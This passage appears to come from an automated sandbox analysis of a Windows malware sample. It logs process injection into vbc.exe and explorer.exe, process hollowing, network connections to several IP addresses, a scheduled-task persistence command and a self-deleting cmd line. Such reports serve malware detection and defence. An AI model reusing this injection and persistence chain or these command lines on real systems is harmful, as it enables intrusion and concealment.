            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F449A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F449A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F069A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EA4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E89100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E89100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E89100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E976E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F58ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F3FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F50EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F50EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F50EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F046A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F1FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E9766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EAAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E97E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F4AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F4AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F3FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02E8C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EB8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EBA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F41608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02EC37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F07794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F07794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 10_2_02F07794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 149.202.23.211 80
            Source: C:\Windows\explorer.exeNetwork Connect: 45.38.251.204 80
            Source: C:\Windows\explorer.exeNetwork Connect: 45.88.202.115 80
            Source: C:\Windows\explorer.exeNetwork Connect: 99.83.185.45 80
            Source: C:\Windows\explorer.exeNetwork Connect: 23.105.124.225 80
            Source: C:\Windows\explorer.exeNetwork Connect: 216.10.246.131 80
            Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.13.175 80
            Source: C:\Windows\explorer.exeNetwork Connect: 103.20.127.61 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread register set: target process: 3388
            Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3388
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: AC0000
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 401000
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: A3F008
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp'
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
            Source: explorer.exe, 00000005.00000000.231629035.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
            Source: explorer.exe, 00000005.00000000.233022311.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000A.00000002.594820876.0000000005AF0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000005.00000000.248469963.0000000006860000.00000004.00000001.sdmp, wlanext.exe, 0000000A.00000002.594820876.0000000005AF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000005.00000000.233022311.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000A.00000002.594820876.0000000005AF0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000005.00000000.233022311.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 0000000A.00000002.594820876.0000000005AF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Users\user\Desktop\JAAkR51fQY.exe VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
